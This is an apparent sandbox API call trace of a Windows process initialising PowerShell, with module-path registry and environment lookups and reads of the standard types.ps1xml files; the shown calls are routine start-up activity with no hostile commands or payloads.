	[0375.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.782] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0375.782] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0375.782] CoTaskMemFree (pv=0x1b770e10) 
	[0375.784] CoTaskMemAlloc (cb=0xcc) returned 0x1b780a10
	[0375.784] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b780a10, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0375.784] CoTaskMemFree (pv=0x1b780a10) 
	[0375.784] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4a8 | out: phkResult=0x24d4a8*=0x328) returned 0x0
	[0375.784] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d42c, lpData=0x0, lpcbData=0x24d428*=0x0 | out: lpType=0x24d42c*=0x2, lpData=0x0, lpcbData=0x24d428*=0x6c) returned 0x0
	[0375.784] CoTaskMemAlloc (cb=0x70) returned 0x101040
	[0375.784] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d3fc, lpData=0x101040, lpcbData=0x24d3f8*=0x6c | out: lpType=0x24d3fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24d3f8*=0x6c) returned 0x0
	[0375.784] CoTaskMemFree (pv=0x101040) 
	[0375.784] CoTaskMemAlloc (cb=0xcc) returned 0x1b780a10
	[0375.784] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b780a10, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0375.784] CoTaskMemFree (pv=0x1b780a10) 
	[0375.785] CoTaskMemAlloc (cb=0xcc) returned 0x1b780a10
	[0375.785] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b780a10, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0375.785] CoTaskMemFree (pv=0x1b780a10) 
	[0375.788] RegCloseKey (hKey=0x328) returned 0x0
	[0375.788] CoTaskMemAlloc (cb=0xcc) returned 0x1b780a10
	[0375.789] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b780a10, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0375.789] CoTaskMemFree (pv=0x1b780a10) 
	[0375.789] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4a8 | out: phkResult=0x24d4a8*=0x328) returned 0x0
	[0375.789] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d42c, lpData=0x0, lpcbData=0x24d428*=0x0 | out: lpType=0x24d42c*=0x0, lpData=0x0, lpcbData=0x24d428*=0x0) returned 0x2
	[0375.789] RegCloseKey (hKey=0x328) returned 0x0
	[0375.793] CoTaskMemAlloc (cb=0x20c) returned 0x1554a0
	[0375.794] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1554a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0375.795] CoTaskMemFree (pv=0x1554a0) 
	[0375.795] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d030, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0375.796] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0375.806] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0375.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0375.807] CoTaskMemFree (pv=0x1b770e10) 
	[0375.810] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0375.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0375.810] CoTaskMemFree (pv=0x1b770e10) 
	[0375.813] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0375.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0375.813] CoTaskMemFree (pv=0x1b770e10) 
	[0375.813] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0375.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0375.813] CoTaskMemFree (pv=0x1b770e10) 
	[0375.815] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d298 | out: phkResult=0x24d298*=0x330) returned 0x0
	[0375.816] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24d2ac, lpData=0x0, lpcbData=0x24d2a8*=0x0 | out: lpType=0x24d2ac*=0x1, lpData=0x0, lpcbData=0x24d2a8*=0x74) returned 0x0
	[0375.817] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24d21c, lpData=0x0, lpcbData=0x24d218*=0x0 | out: lpType=0x24d21c*=0x1, lpData=0x0, lpcbData=0x24d218*=0x74) returned 0x0
	[0375.817] CoTaskMemAlloc (cb=0x78) returned 0x101040
	[0375.817] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24d1ec, lpData=0x101040, lpcbData=0x24d1e8*=0x74 | out: lpType=0x24d1ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d1e8*=0x74) returned 0x0
	[0375.817] CoTaskMemFree (pv=0x101040) 
	[0375.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0375.818] SetErrorMode (uMode=0x1) returned 0x1
	[0375.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d170 | out: lpFileInformation=0x24d170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0375.818] SetErrorMode (uMode=0x1) returned 0x1
	[0375.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0375.821] SetErrorMode (uMode=0x1) returned 0x1
	[0375.821] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d170 | out: lpFileInformation=0x24d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0375.821] SetErrorMode (uMode=0x1) returned 0x1
	[0376.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0376.372] SetErrorMode (uMode=0x1) returned 0x1
	[0376.372] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d170 | out: lpFileInformation=0x24d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0376.372] SetErrorMode (uMode=0x1) returned 0x1
	[0376.376] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0376.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0376.376] CoTaskMemFree (pv=0x1b770e10) 
	[0376.384] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0376.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0376.384] CoTaskMemFree (pv=0x1b770e10) 
	[0376.385] GetACP () returned 0x4e4
	[0376.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0376.394] SetErrorMode (uMode=0x1) returned 0x1
	[0376.394] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0376.395] GetFileType (hFile=0x334) returned 0x1
	[0376.395] SetErrorMode (uMode=0x1) returned 0x1
	[0376.395] GetFileType (hFile=0x334) returned 0x1
	[0376.399] ReadFile (in: hFile=0x334, lpBuffer=0x2cb8bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb8bc8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0376.402] ReadFile (in: hFile=0x334, lpBuffer=0x2cb8bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb8bc8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0376.403] ReadFile (in: hFile=0x334, lpBuffer=0x2cb8bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb8bc8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0376.403] ReadFile (in: hFile=0x334, lpBuffer=0x2cb8bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb8bc8*, lpNumberOfBytesRead=0x24d0a8*=0xcf3, lpOverlapped=0x0) returned 1
	[0376.403] ReadFile (in: hFile=0x334, lpBuffer=0x2cb8023, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb8023*, lpNumberOfBytesRead=0x24d0a8*=0x0, lpOverlapped=0x0) returned 1
	[0376.403] ReadFile (in: hFile=0x334, lpBuffer=0x2cb8bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb8bc8*, lpNumberOfBytesRead=0x24d0a8*=0x0, lpOverlapped=0x0) returned 1
	[0376.406] CloseHandle (hObject=0x334) returned 1
	[0376.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0376.409] SetErrorMode (uMode=0x1) returned 0x1
	[0376.409] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d020 | out: lpFileInformation=0x24d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0376.410] SetErrorMode (uMode=0x1) returned 0x1
	[0376.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0376.411] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d108 | out: phkResult=0x24d108*=0x334) returned 0x0
	[0376.411] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d08c, lpData=0x0, lpcbData=0x24d088*=0x0 | out: lpType=0x24d08c*=0x1, lpData=0x0, lpcbData=0x24d088*=0x56) returned 0x0
	[0376.411] CoTaskMemAlloc (cb=0x5a) returned 0x171d20
	[0376.411] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d05c, lpData=0x171d20, lpcbData=0x24d058*=0x56 | out: lpType=0x24d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d058*=0x56) returned 0x0
	[0376.411] CoTaskMemFree (pv=0x171d20) 
	[0376.411] RegCloseKey (hKey=0x334) returned 0x0
	[0376.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0376.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0377.313] GetSystemInfo (in: lpSystemInfo=0x24bd40 | out: lpSystemInfo=0x24bd40*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0377.315] VirtualQuery (in: lpAddress=0x24bdf0, lpBuffer=0x24ccb0, dwLength=0x30 | out: lpBuffer=0x24ccb0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0377.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0377.328] SetErrorMode (uMode=0x1) returned 0x1
	[0377.328] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0377.328] GetFileType (hFile=0x330) returned 0x1
	[0377.328] SetErrorMode (uMode=0x1) returned 0x1
	[0377.328] GetFileType (hFile=0x330) returned 0x1
	[0377.328] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.329] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.329] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.330] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.330] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.330] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.330] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.330] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.330] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.331] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.331] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.332] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.332] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.332] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.332] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.332] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.333] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.334] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.334] ReadFile (in: hFile=0x330, lpBuffer=0x2bc17c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0a8, lpOverlapped=0x0 | out: lpBuffer=0x2bc17c8*, lpNumberOfBytesRead=0x24d0a8*=0x1000, lpOverlapped=0x0) returned 1
